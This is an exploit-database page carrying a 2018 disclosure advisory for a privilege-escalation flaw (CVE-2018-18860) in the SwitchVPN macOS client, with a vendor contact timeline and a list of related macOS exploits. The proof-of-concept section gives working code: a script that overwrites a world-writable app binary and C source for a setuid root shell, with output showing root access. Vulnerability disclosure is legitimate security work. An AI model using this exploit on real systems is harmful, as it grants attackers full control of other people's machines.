Menu

Search for hundreds of thousands of exploits

"SwitchVPN for macOS 2.1012.03 - Privilege Escalation"

Author

"Bernd Leitner"

Platform

macos

Release date

2018-11-14

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
=======================================================================
Title: Privilege Escalation Vulnerability
Product: SwitchVPN for MacOS
Vulnerable version: 2.1012.03
CVE ID: CVE-2018-18860
Impact: Critical
Homepage: https://switchvpn.net/
Identified: 2018-09-29
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================

Vendor description:
-------------------
"By 2015 we were frustrated that the free internet we loved was under
threat.
As experts in online security we believed we could solve this problem. So we
came together as a team to make SwitchVPN, a simple and powerful app to keep
the internet free. SwitchVPN is simple. Install it on your phone, tablet or
laptop, then just switch it on to keep the internet free. SwitchVPN is
powerful.
Our exclusive VPN Service technology is constantly being upgraded by a
dedicated
team of internet security experts."

Source: https://switchvpn.net/


Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker
can fully compromise a MacOS system with an installation of the SwitchVPN
client.

Users are urged to uninstall the SwitchVPN client for MacOS until the
issues have
been fixed.


Vulnerability overview/description:
-----------------------------------
1) Privilege Escalation Vulnerability (reserved CVE-2018-18860)

After installation or an update, the script "fix_permissions.sh" is run by
the application. This script changes the owner of the main application
binaries
to root and sets them to world-writable. Additionally, the SUID bit is set
for
another sensitive binary in the application folder. This configuration
makes it
very easy to escalate privileges to root.

After the installation or update of SwitchVPN, the following script is run:

============================================================================================
...
switchvpn_updater.dat
mb:MacOS b$ file switchvpn_updater.dat
switchvpn_updater.dat: Qt Binary Resource file
...
if (systemInfo.kernelType === "darwin") {
  console.log("Run permissions\n");
  component.addElevatedOperation("Execute",
"/Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/fix_permissions.sh");
}
...
============================================================================================
mb:MacOS b$ cat fix_permissions.sh
#!/bin/sh

chown -R root /Applications/SwitchVPN/SwitchVPN.app/
chgrp -R admin /Applications/SwitchVPN/SwitchVPN.app/
chmod -R 777 /Applications/SwitchVPN/SwitchVPN.app/
chmod -R u+s /Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/compose8
============================================================================================

This leads to an overpermissive application configuration:

============================================================================================
mb:MacOS b$ ls -al
total 18720
drwxrwxrwx  35 root  admin     1120 Sep 29 20:39 .
drwxrwxrwx  16 root  admin      512 Sep 29 20:39 ..
-rwxrwxrwx   1 root  admin   106224 Oct 12  2017 SwitchVPN
-rwxrwxrwx   1 root  admin  4693216 Oct 12  2017 SwitchVPN_GUI
-r-xr-xr-x   1 root  wheel  2859376 Oct 12  2017 compose
-r-xr-xr-x   1 root  wheel    29184 Oct 12  2017 compose10
-r-xr-xr-x   1 root  wheel    29184 Oct 12  2017 compose11
-r-xr-xr-x   1 root  wheel    59152 Oct 12  2017 compose3
-r-xr-xr-x   1 root  wheel    39008 Oct 12  2017 compose4
-r-xr-xr-x   1 root  wheel   587776 Oct 12  2017 compose6
-r-xr-xr-x   1 root  wheel   278848 Oct 12  2017 compose7
-r-sr-xr-x   1 root  wheel    22800 Oct 12  2017 compose8
-r-xr-xr-x   1 root  wheel    19056 Oct 12  2017 compose9
-r-xr-xr-x   1 root  wheel   132160 Oct 12  2017 composec
-r-xr-xr-x   1 root  wheel   510464 Oct 12  2017 composecn
-r-xr-xr-x   1 root  wheel     5632 Oct 12  2017 down.sh
-rwxrwxrwx   1 root  admin      245 Oct 12  2017 fix_permissions.sh
-rw-r--r--   1 root  admin       56 Sep 29 20:39 log.txt
-r-xr-xr-x   1 root  wheel    39050 Oct 12  2017 up.sh
============================================================================================

Further investigation shows, that the "SwitchVPN_GUI" binary is run as root:

============================================================================================
mb:MacOS b$ ps aux | grep -i switch
root             15165   4.6  0.4  4515952  72912   ??  S     8:39PM
 0:08.84 SwitchVPN_GUI
============================================================================================

After statically analysing the "SwitchVPN" binary, it became clear, that it
runs the "compose8" SUID root binary. Further analysis showed, that
"compose8"
subsequently runs the "SwitchVPN_GUI" binary and since it's world-writable,
an
attacker can exploit the situation to escalate privileges.

============================================================================================
# SwitchVPN -> compose8
...add     rdx, [rdx+10h]
lea     rsi, aCompose8_0 ; "compose8"
lea     rcx, aSwitchvpn ; "SwitchVPN"
xor     r9d, r9d
xor     eax, eax
mov     rdi, rbx        ; char *
mov     r8, r14
call    _execl
...
============================================================================================

============================================================================================
# compose8 -> SwitchVPN_GUI
...
lea     rsi, aCompose8WillIn ; "Compose8 will invoke GUI app %s, %s\n"
xor     eax, eax
mov     rdx, rbx
mov     rcx, r12
call    _fprintf
cmp     r15d, 4
lea     rdx, aB         ; "-b"
cmovnz  rdx, r14
xor     ecx, ecx
xor     eax, eax
mov     rdi, rbx        ; char *
mov     rsi, r12        ; char *
call    _execl
...
============================================================================================

Running the "SwitchVPN" binary from the command line confirms the issue:

============================================================================================
./SwitchVPN
This app (compose8) invoked with args:
/Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS, SwitchVPN
Compose8 will invoke GUI app
/Applications/SwitchVPN/SwitchVPN.app/Contents/MacOS/SwitchVPN_GUI,
SwitchVPN_GUI
============================================================================================


Proof of concept:
-----------------
1) Privilege Escalation Vulnerability
A situation like the one described above provides a wide range of
possibilities for escalating privileges to root. A quick and easy way is to
write the following shell script to "SwitchVPN_GUI":

============================================================================================
#!/bin/bash
chown root /tmp/shell
chmod 4755 /tmp/shell
============================================================================================

Create and compile the following execve() based shell:

============================================================================================
#include <stdlib.h>
#include <unistd.h>
main () {
  setuid(0);
  seteuid(0);
  setgid(0);
  execve("/bin/sh", 0, 0);
}

gcc shell.c -o shell
============================================================================================

Copy the shell binary to an attacker controlled location (e.g. /tmp).
Start the "SwitchVPN.app" as a local, unprivileged user. Afterwards the
execution of /tmp/shell will drop the user/attacker to a root shell:

============================================================================================
-rwsr-xr-x   1 root  wheel    8576 Sep 29 20:34 shell
-rw-r--r--   1 b     wheel     127 Sep 29 20:33 shell.c

bash-3.2$ whoami
b
bash-3.2$ ./shell
bash-3.2# whoami
root
============================================================================================


Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable: 2.1012.03.
Earlier versions might be vulnerable as well.


Vendor contact timeline:
------------------------
2018-10-04: Requested security contact via https://switchvpn.net
2018-10-10: Contacted vendor through mark@switchvpn.com
2018-10-17: Requested status update from vendor
2018-10-30: Sent new contact details & public PGP key to mark@switchvpn.com
2018-10-31: Requested status update from vendor
2018-11-12: Informed vendor about advisory release

Solution:
---------
None.


Workaround:
-----------
None.


EOF B. Leitner / @2018
Release Date Title Type Platform Author
2019-08-05 "macOS iMessage - Heap Overflow when Deserializing" dos macos "Google Security Research"
2019-07-02 "Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)" local macos Metasploit
2019-05-27 "Typora 0.9.9.24.6 - Directory Traversal" remote macos "Dhiraj Mishra"
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
2019-04-18 "Evernote 7.9 - Code Execution via Path Traversal" local macos "Dhiraj Mishra"
2019-03-01 "macOS XNU - Copy-on-Write Behavior Bypass via Mount of User-Owned Filesystem Image" dos macos "Google Security Research"
2019-02-13 "Apple macOS 10.13.5 - Local Privilege Escalation" local macos Synacktiv
2019-02-20 "FaceTime - Texture Processing Memory Corruption" dos macos "Google Security Research"
2019-01-31 "macOS XNU - Copy-on-Write Behaviour Bypass via Partial-Page Truncation of File" dos macos "Google Security Research"
2019-01-24 "Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)" dos macos "Saeed Hasanzadeh"
2018-12-14 "Safari - Proxy Object Type Confusion (Metasploit)" remote macos Metasploit
2018-11-29 "Mac OS X - libxpc MITM Privilege Escalation (Metasploit)" local macos Metasploit
2018-11-20 "Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)" dos macos "Fabiano Anemone"
2018-11-14 "SwitchVPN for macOS 2.1012.03 - Privilege Escalation" local macos "Bernd Leitner"
2018-11-13 "CuteFTP Mac 3.1 - Denial of Service (PoC)" dos macos "Yair Rodríguez Aparicio"
2018-11-06 "FaceTime - 'VCPDecompressionDecodeFrame' Memory Corruption" dos macos "Google Security Research"
2018-11-06 "FaceTime - 'readSPSandGetDecoderParams' Stack Corruption" dos macos "Google Security Research"
2018-11-05 "LiquidVPN 1.36 / 1.37 - Privilege Escalation" local macos "Bernd Leitner"
2018-05-30 "Yosoro 1.0.4 - Remote Code Execution" webapps macos "Carlo Pelliccioni"
2017-02-24 "Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting" webapps macos "Google Security Research"
2017-06-06 "Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution" remote macos saelo
2017-05-04 "Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free" remote macos "saelo & niklasb"
2017-02-23 "Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read" remote macos "Google Security Research"
2018-07-30 "Charles Proxy 4.2 - Local Privilege Escalation" local macos "Mark Wadham"
2018-03-20 "Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation" local macos "Google Security Research"
2017-01-16 "Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation" local macos "Brandon Azad"
2017-12-07 "Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak" local macos "Brandon Azad"
2017-11-28 "Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation" local macos Lemiorhan
2017-12-06 "Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Proxifier for Mac 2.19 - Local Privilege Escalation" local macos "Mark Wadham"
Release Date Title Type Platform Author
2018-11-14 "SwitchVPN for macOS 2.1012.03 - Privilege Escalation" local macos "Bernd Leitner"
2018-11-05 "LiquidVPN 1.36 / 1.37 - Privilege Escalation" local macos "Bernd Leitner"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45854/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/45854/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/45854/40358/switchvpn-for-macos-2101203-privilege-escalation/download/", "exploit_id": "45854", "exploit_description": "\"SwitchVPN for macOS 2.1012.03 - Privilege Escalation\"", "exploit_date": "2018-11-14", "exploit_author": "\"Bernd Leitner\"", "exploit_type": "local", "exploit_platform": "macos", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse